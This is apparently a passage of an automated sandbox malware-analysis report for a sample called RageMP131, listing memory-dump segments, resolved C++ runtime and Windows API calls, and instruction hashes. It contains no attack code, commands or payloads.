                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: cd92006eb54974801c6bbc56036a23bc73efa0b45f6ddb12cb1c80a74dcb227d
                                      • Instruction ID: 681709bf327c2b299471801f4f6cc2e6602d926d3c84edf42797dacdfd179704
                                      • Opcode Fuzzy Hash: cd92006eb54974801c6bbc56036a23bc73efa0b45f6ddb12cb1c80a74dcb227d
                                      • Instruction Fuzzy Hash: 3961B7B1D0411AAFDF11DFA8C854AFE7BFBAF09304F140149E900AB215D776DA91CBA0
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0062AE01
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction ID: 9e2ca5445aba634514ad649963c140dbc83a1039a5f065516e1cfd74149cd958
                                      • Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction Fuzzy Hash: 7F412672A005249BCF15DFA8ED806AEBBAAEF44301F1406ADF804EB301D770DE119BD6
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,006B1719,00000000,CF830579,006EFCB8,0000000C,006B17D5,006A58DD,?), ref: 006B1888
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 0f107330d766cddc7c0a10907746bdf71365b580d9ec1d68e06f7701c5daf90e
                                      • Instruction ID: 5bc2f20d26a9b35c3e8cca8815c299f6c5b3eadc7762f586cada59ffb6ad2177
                                      • Opcode Fuzzy Hash: 0f107330d766cddc7c0a10907746bdf71365b580d9ec1d68e06f7701c5daf90e
                                      • Instruction Fuzzy Hash: FF112B736091143AD725227468267FE2B8B9FD3734F75065DF9048F2D2DE619CC18359
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,006EF970,0069B2D2,00000002,0069B2D2,00000000,?,?,?,006AAE86,00000000,?,0069B2D2,00000002,006EF970), ref: 006AADB8
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 2ce7ae582f8b46220ab4808cfc6793fffa7de235c42d37fd6130b3dbbb1739f2
                                      • Instruction ID: f6a76a549e8bbf57d57b7da09c611a02f18cf7d3809bc9899d6c6604932da778
                                      • Opcode Fuzzy Hash: 2ce7ae582f8b46220ab4808cfc6793fffa7de235c42d37fd6130b3dbbb1739f2
                                      • Instruction Fuzzy Hash: D301D6326141556FCF05AF59DC05DDE3B6BDF82321B340249F8519B291EB71DD51CB90
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C1FDE
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID:
                                      • API String ID: 2659868963-0
                                      • Opcode ID: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
                                      • Instruction ID: d403e680dad0dac643e662c12a223aaad6f45f1c8de352debb111a33a0deecec
                                      • Opcode Fuzzy Hash: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
                                      • Instruction Fuzzy Hash: 72012B3540460D77CF14AED4EC01999B79EDE02360B50853DF90496951FB70E9908BE9
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,0069A41C,?,?,006B2A99,00000001,00000364,?,00000006,000000FF,?,0069D39B,?,?,?,?), ref: 006B3154
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: b12476a358bce82ef68f4064fd569e8f45a1d6f8fd6cf518fd8a52ef0d4f9940
                                      • Instruction ID: 0f5cd83bb9a70e47d0afb4a006223b1273c52556a314f8ff0af23e613e2b0775
                                      • Opcode Fuzzy Hash: b12476a358bce82ef68f4064fd569e8f45a1d6f8fd6cf518fd8a52ef0d4f9940
                                      • Instruction Fuzzy Hash: B6F0E971705638669B217A6D8C02BDB374FAF42BA0B158015BC08A6380CF30DE8147F4
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0069D39B,?,?,?,?,?,005C2D8D,0069A41C,?,?,0069A41C), ref: 006B3B80
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: fa2fa0197be4a77caad243701c860a6bf21599fd3bb548500bdb49f8ec4136fd
                                      • Instruction ID: 44a26996c7d40496956b391cdf2b89e9c02d3823269eca9dc1fa9511170bce6e
                                      • Opcode Fuzzy Hash: fa2fa0197be4a77caad243701c860a6bf21599fd3bb548500bdb49f8ec4136fd
                                      • Instruction Fuzzy Hash: 68E0EDB13002366AE62036294C00BEB7A4FDFA23B0F150228AC1896385CF60CE8083B8
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0062A143
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0062A165
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0062A185
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0062A1AF
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0062A21D
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0062A269
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0062A283
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0062A318
                                      • std::_Facet_Register.LIBCPMT ref: 0062A325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                      • String ID: bad locale name
                                      • API String ID: 3375549084-1405518554
                                      • Opcode ID: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
                                      • Instruction ID: 4520bb9ea4f2fb13aca0336c54c8218bd6ba6c1c77e2a4e536d750809e56c57a
                                      • Opcode Fuzzy Hash: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
                                      • Instruction Fuzzy Hash: 1B617BB1D006589BDF50DFE4E849BAEBBF6AF04710F18401DE805A7341EBB5AA05CF96
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 005C37E9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005C3835
                                      • __Getctype.LIBCPMT ref: 005C384E
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005C386A
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 005C38FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                      • String ID: 0:\$bad locale name
                                      • API String ID: 1840309910-381323209
                                      • Opcode ID: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
                                      • Instruction ID: 85dadb2b629b003dd1c15cde83567e63b6603cd8f7c5dc18547b40831c741856
                                      • Opcode Fuzzy Hash: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
                                      • Instruction Fuzzy Hash: D7515DB1D002489FEF10DFE4D945B9EFBF9AF14710F14812DE804AB241E775AA48CB92
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 0069FB67
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0069FB6F
                                      • _ValidateLocalCookies.LIBCMT ref: 0069FBF8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0069FC23
                                      • _ValidateLocalCookies.LIBCMT ref: 0069FC78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
                                      • Instruction ID: c6980bd0654e9df2564edadb583b94701c4113cb8d758c70f22ad7e66554c7f6
                                      • Opcode Fuzzy Hash: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
                                      • Instruction Fuzzy Hash: 1541C83190020CDBCF10EF68C894AAEBBAAAF45324F25C069EC14DB752D771ED41CB91
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00628903
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00628926
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00628946
                                      • std::_Facet_Register.LIBCPMT ref: 006289BB
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006289D3
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 006289EB
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                      • String ID:
                                      • API String ID: 2081738530-0
                                      • Opcode ID: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
                                      • Instruction ID: c9029f6896445d316dd5a04902b74ce52702629516f2bc47d1272f8ecbd4cb18
                                      • Opcode Fuzzy Hash: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
                                      • Instruction Fuzzy Hash: 6241DF71D016299FCB10DF98EC41ABABBB6FB04320F144259E9156B751DB30AE84CFD2
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C60F2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C617F
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C6248
                                      Strings
                                      • recursive_directory_iterator::operator++, xrefs: 005C61CC
                                      Memory Dump Source
